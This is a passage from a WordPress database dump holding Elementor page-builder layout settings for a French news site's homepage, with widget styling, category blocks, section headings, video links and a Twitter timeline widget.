t\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1858,601,'_elementor_version','0.4'),(1859,601,'_elementor_css','a:3:{s:4:\"time\";i:1508936210;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1860,602,'_elementor_edit_mode','builder'),(1861,602,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\